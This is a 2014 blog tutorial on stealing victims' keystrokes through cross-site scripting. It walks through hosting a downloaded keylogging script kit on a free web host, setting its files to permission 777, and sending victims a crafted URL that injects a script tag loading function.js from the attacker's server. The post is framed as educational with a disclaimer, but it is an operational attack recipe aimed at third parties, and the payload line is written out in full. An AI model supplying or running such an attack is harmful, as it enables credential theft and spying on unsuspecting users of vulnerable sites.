Saturday, 28 June 2014

Keylogging on a XSS Vulnerable Site


What is XSS?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

In this tutorial, I am going to show you how to keylog someone just by XSS, for which you need to have a XSS vulnerable site in order to perform this kind of attack.

1. Firstly Download the XSS Keylogging script files (Download button is given below).

2. You need a Free Web Hosting Site account. If you don't have, you can make one from any of the given sites;

If you want any other site, then you can search for it on Google.

3. Now extract the files from the archive which you downloaded on first step and then go to the File Manager to upload them to your File Hosting Site account ( I am using 
000WebHost.com in my case ).




Now anything which will go on working on your site URL should be done in public_html directory, so open it by clicking and delete all the files in it, if present. ( This method is only for 000WebHost.com ).



Now upload all the XSS Keylogging Script configuration files in the public_html directory from your computer.



4. After uploading all of them, now select function.js and click on Edit to edit the file;


Now edit function.js replace YOURWEBHOSTING.COM with your Web Hosting Site account URL, as the given picture below;


5. Now you have to change permissions of all the files ( i.e. function.js, logs.txt and post.php ), select each file one by one and then click Chmod to change the permission; ( In the screenshot I had shown only one file, but you have to change permission of all the 3 files to 777 ).


Now change its value to 777;


6. Now you have setup everything that is needed to perform this attack, all you have to do now is to find a XSS vulnerbale site and create our evil payload and send to the victim, like;

http://www.xssvulnerablesite.com/file.php?keywords=<script src="http://YOURWEBHOSTING.COM/function.js"></script>

The keylogging process will work as long as the victim will not leave the page, after that it will not work anymore. Hopefully you have learnt something new from this tutorial which is going help you understand more and better that how XSS works.

Note: Do Not Use Any Tutorial Of This Blog To Harm Anyone. This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.

Size: 693 Bytes





Do you my like Articles..?

Get Free Email Updates Daily!

Follow us!

Categories:

1 comment:

  1. Bluehost is definitely the best website hosting provider with plans for any hosting needs.

    ReplyDelete

Please Comment Here To Inform Us Your Review About It. Thank You